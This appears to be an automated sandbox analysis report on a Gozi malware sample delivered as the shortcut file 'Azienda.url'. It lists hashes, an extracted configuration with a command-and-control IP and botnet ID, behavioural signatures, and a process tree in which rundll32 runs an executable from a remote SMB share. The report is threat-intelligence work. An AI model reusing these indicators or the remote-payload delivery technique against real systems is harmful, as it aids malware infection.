Analysis
-
max time kernel
148s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
10-10-2023 09:00
Static task
static1
Behavioral task
behavioral1
Sample
Azienda.url
Resource
win7-20230831-en
windows7-x64
1 signatures
150 seconds
General
-
Target
Azienda.url
-
Size
191B
-
MD5
7d41622bb8e2d0cc1e148b9d536c792b
-
SHA1
e6c5682c27e11089d168601cd4764f038c084594
-
SHA256
6d66bf2eb0563f2298843d23431e879c2f7d7354b15e49a8c28c915b295f95cf
-
SHA512
1524ae1315fd5cf3c54ca3b636c1ce869edcafb789684d9761e1f0feb4e87a74ae909e76e435614715aa61b721690e943b5143613152fd2d5cd2af70052a9b40
Malware Config
Extracted
Family
gozi
Extracted
Family
gozi
Botnet
5050
C2
193.203.162.14
Attributes
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
rsa_pubkey.plain
aes.plain
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
rundll32.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
rundll32.exedescription pid process target process PID 4724 wrote to memory of 4208 4724 rundll32.exe unito.exe PID 4724 wrote to memory of 4208 4724 rundll32.exe unito.exe PID 4724 wrote to memory of 4208 4724 rundll32.exe unito.exe
Processes
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Azienda.url1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4724 -
\??\UNC\62.173.145.25\scarica\unito.exe"\\62.173.145.25\scarica\unito.exe"2⤵PID:4208